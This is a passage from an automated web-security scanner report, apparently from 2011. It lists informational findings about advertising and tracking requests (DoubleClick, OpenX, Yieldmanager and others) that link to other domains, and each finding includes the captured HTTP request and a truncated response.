<script language="JavaScript" src="http://guru.sitescout.com/tag.jsp?pid=66738FF&w=300&h=250&rnd=6848350&cm=http://click.adbrite.com/c/CvMCxYEuuBnWZTkIPVmBPewA4aV85MACQqj-YPCxxOMtfurS0IoFdYEHJcpUeMvrhctEXenWGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWCXY9D2-QHOfg6pX0b9LTtaTQI8E9Y1hXVck9VT8EmRAoIKD-Hz3s10ZMQecjaqU1-wroyCzUm10G_MBmfksRDzlEfApCpYRe4nJ4H9-0oXD48jRc9TSMbik2vsesqhIsvKOysmRbXe1I-7Vja6eSCJtFt5tcQrjLwvpdsi29oHYRBPhO6ykaJrFmFxpw4brKP1BrwMo-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5DuYwFuBIXYIP2GUCTEZxixKIhDFXNJ-gBTmXDtBT1blNlYPRxJB5sCt1ixJxrn4SEN9R-H60fWjJ_p2N9hBFksU/"></script>
<!-- 13667710 -->
<img border="0" height="0" src="http://ad.turn.com/server/pixel.htm?fpid=7" width="0" /><img border="0" height="0" src="http://adadvisor.net/adscores/g.pixel?sid=9219303187" width="0" /></body>
...[SNIP]...

23.13. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /pixel?nid=exelate&j=0 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Found
Location: http://loadm.exelator.com/load/?p=204&g=001&bi=CAESENh7sluIi3Lo5TRo_oosBvM&cver=1&j=0
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 01:56:10 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 298
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://loadm.exelator.com/load/?p=204&amp;g=001&amp;bi=CAESENh7sluIi3Lo5TRo_oosBvM&amp;cver=1&amp;j=0">here</A>
...[SNIP]...

23.14. http://csc.beap.ad.yieldmanager.net/i

Summary

Severity:   Information
Confidence:   Certain
Host:   http://csc.beap.ad.yieldmanager.net
Path:   /i

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /i?bv=1.0.0&bs=(12843fkhk(gid$BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt,st$1304292783218678,v$1.0))&t=J-D&al=(as$12c6r0iom,aid$iFueFUwN7y4-,bi$589320551,ct$25,at$H)&s=0&r=0.17090801848098636 HTTP/1.1
Host: csc.beap.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=110

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:34:05 GMT
Location: http://cookex.amp.yahoo.com/v2/cexposer/SIG=174r9kikp/*http%3A//csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(12843fkhk(gid$BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt,st$1304292783218678,v$1.0))&t=J-D&al=(as$12c6r0iom,aid$iFueFUwN7y4-,bi$589320551,ct$25,at$H)&s=0&r=0.17090801848098636
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 543

The document has moved <A HREF="http://cookex.amp.yahoo.com/v2/cexposer/SIG=174r9kikp/*http%3A//csc.beap.ad.yieldmanager.net/i?bv=1.0.0&amp;bs=(12843fkhk(gid$BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt,st$1304292783218678,v$1.0))&amp;t=J-D&amp;al=(as$12c6r0iom,aid$iFueFUwN7y4-,bi$589320551,ct$25,at$H)&amp;s=0&amp;r=0.17090801848098636">here</A>
...[SNIP]...

23.15. http://d1.openx.org/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /afr.php?resize=1&campaignid=246606&what=chi160x600&ct0=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D;cb=1442324580& HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=bba0cb56df6b6edbf6102c35304755de

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:07:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=bba0cb56df6b6edbf6102c35304755de; expires=Tue, 01-May-2012 02:07:47 GMT; path=/
Content-Length: 2280
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<body onload="MAX_adjustframe(window);">
<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2193540&PluID=0&w=160&h=600&5178448dd1&ncu=http://d1.openx.org/ck.php?oaparams=2__bannerid=522976__zoneid=0__OXLCA=1__cb=5178448dd1__r_id=bb886cd50eee7cc6d15eccca2981af76__r_ts=lkjpwz__oadest=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D%3Bcb%3D1442324580http%253A%252F%252Fwww.zipcar.com%252Fwebchi3col75&ucm=true&ncu=$$%c$$"></script>
...[SNIP]...
<a href="%chttp%3A//bs.serving-sys.com/BurstingPipe/adServer.bs%3Fcn%3Dbrd%26FlightID%3D2193540%26Page%3D%26PluID%3D0%26Pos%3D868" target="_blank"><img src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2193540&Page=&PluID=0&Pos=868" border=0 width=160 height=600></a>
...[SNIP]...

23.16. http://dg.specificclick.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dg.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /?y=3&t=h&u=http%3A%2F%2Fwww.japanator.com%2Felephant%2Fsignup.phtml&r= HTTP/1.1
Host: dg.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7e-J^1^1; ug=wJ6hSWn821G3dA; smdmp=7e-J:811200901; adf=7e-J^0^0; JSESSIONID=e6b9ee4de5a3ea16db33db035dfa

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=e6cd1ea613a500dd6ba371035dc2; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 02 May 2011 01:57:37 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 569

<html><body> <script> var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = docume
...[SNIP]...
<noscript> <img src="http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1" /> </noscript>
...[SNIP]...

23.17. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5140108018215676&output=html&h=250&slotname=4535167573&w=300&lmt=1304337437&flash=10.2.154&url=http%3A%2F%2Fwww.japanator.com%2Felephant%2Flogin.phtml&dt=1304319437619&bpp=2&shv=r20110427&jsv=r20110427&correlator=1304319437654&frm=0&adk=556830188&ga_vid=878351806.1304319358&ga_sid=1304319358&ga_hid=1076911821&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&ref=http%3A%2F%2Fwww.japanator.com%2Felephant%2Flogin.phtml&fu=0&ifi=2&dtd=1163&xpc=miKvAb4fmL&p=http%3A//www.japanator.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 01:57:20 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 10622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#cc0000;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.japanator.com/elephant/login.phtml%26hl%3Den%26client%3Dca-pub-5140108018215676%26adU%3Dwww.Moxiesoft.com%26adT%3DKnowledge%2BBase%2BSoftware%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26gl%3DUS&amp;usg=AFQjCNE4NjFFGoqc8ogFv-crNmcMnVwNnA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.18. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5140108018215676&output=html&h=250&slotname=4535167573&w=300&lmt=1304337450&flash=10.2.154&url=http%3A%2F%2Fwww.japanator.com%2Felephant%2Fsignup.phtml&dt=1304319450266&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304319450303&frm=0&adk=556830188&ga_vid=878351806.1304319358&ga_sid=1304319358&ga_hid=1649311869&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=2&dtd=1597&xpc=ZdHsnL4dpF&p=http%3A//www.japanator.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 01:57:32 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 10626

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#cc0000;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.japanator.com/elephant/signup.phtml%26hl%3Den%26client%3Dca-pub-5140108018215676%26adU%3Dwww.Moxiesoft.com%26adT%3DKnowledge%2BBase%2BSoftware%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26gl%3DUS&amp;usg=AFQjCNGMiXiNgW2pNZyS6giQzFvxZ9jSUg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.19. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4675364852109088&output=html&h=90&slotname=8870801362&w=728&lmt=1304337912&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912482&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304319912561&frm=0&adk=2893163048&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=1&dtd=1173&xpc=ZURzYVvD5x&p=http%3A//www.greenhulk.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 02:05:15 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13601

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#5c9911;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.greenhulk.net/forums/showthread.php%253F126285-Rear-boarding-step%26hl%3Den%26client%3Dca-pub-4675364852109088%26adU%3Dwww.Moxiesoft.com%26adT%3DKnowledge%2BBase%2BSoftware%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26adU%3Dwww.Groupon.com/Chicago%26adT%3DChicago%2BCoupons%26gl%3DUS&amp;usg=AFQjCNHzJysBWRRIlwYmVzEbQuQxmuVXbw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.20. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7382611274909550&output=html&h=90&slotname=1249485879&w=728&lmt=1304328800&flash=10.2.154&url=http%3A%2F%2Fwww.newswiretoday.com%2Fnews%2F89806%2FThe_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management%2F&dt=1304310798928&bpp=4&shv=r20110427&jsv=r20110427&correlator=1304310800014&frm=0&adk=1305630090&ga_vid=829746307.1304310803&ga_sid=1304310803&ga_hid=1098320161&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=967&bih=903&fu=0&ifi=1&dtd=4101&xpc=XZh8klsrGe&p=http%3A//www.newswiretoday.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 01 May 2011 23:33:31 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13341

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#003366;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/%26hl%3Den%26client%3Dca-pub-7382611274909550%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BNetwork%2BSecurity%26adU%3Dwww.itt-tech.edu%26adT%3DITT%2BTech%2B-%2BOfficial%2BSite%26adU%3Dwww.SAS.com%26adT%3DNetwork%2BSecurity%26gl%3DUS&amp;usg=AFQjCNE862XoTqOxEomRscF5oa0sgep63w" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.21. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7382611274909550&output=html&h=600&slotname=9883099109&w=160&lmt=1304328803&flash=10.2.154&url=http%3A%2F%2Fwww.newswiretoday.com%2Fnews%2F89806%2FThe_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management%2F&dt=1304310799175&bpp=109&shv=r20110427&jsv=r20110427&prev_slotnames=1249485879%2C1249485879&correlator=1304310800014&frm=0&adk=2054784108&ga_vid=829746307.1304310803&ga_sid=1304310803&ga_hid=1098320161&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=967&bih=903&fu=0&ifi=3&dtd=3996&xpc=VHwV4gxzpf&p=http%3A//www.newswiretoday.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 01 May 2011 23:33:31 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15740

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#003366;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/%26hl%3Den%26client%3Dca-pub-7382611274909550%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26adU%3Dwww.StrategicThought.com%26adT%3DRisk%2BManagement%26adU%3Dwww.supplychainsecurity.com%26adT%3Dsecurity%2Brisk%2Bassessment%26adU%3Dwww.VillanovaU.com/Certificate%26adT%3DInfo%2BSystems%2BSecurity%26adU%3DSearch.Technology-Schools.com%26adT%3DNetwork%2BSecurity%2BOnline%26gl%3DUS&amp;usg=AFQjCNE9rUmSuRH1IVE0M6f9RpxV04GfpQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.22. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7382611274909550&output=html&h=90&slotname=1249485879&w=728&lmt=1304328803&flash=10.2.154&url=http%3A%2F%2Fwww.newswiretoday.com%2Fnews%2F89806%2FThe_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management%2F&dt=1304310798939&bpp=200&shv=r20110427&jsv=r20110427&prev_slotnames=1249485879&correlator=1304310800014&frm=0&adk=3092990179&ga_vid=829746307.1304310803&ga_sid=1304310803&ga_hid=1098320161&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=967&bih=903&fu=0&ifi=2&dtd=4220&xpc=c3TFhSQ2wK&p=http%3A//www.newswiretoday.com HTTP/1.1
Host: googleads.g.doubleclick.net
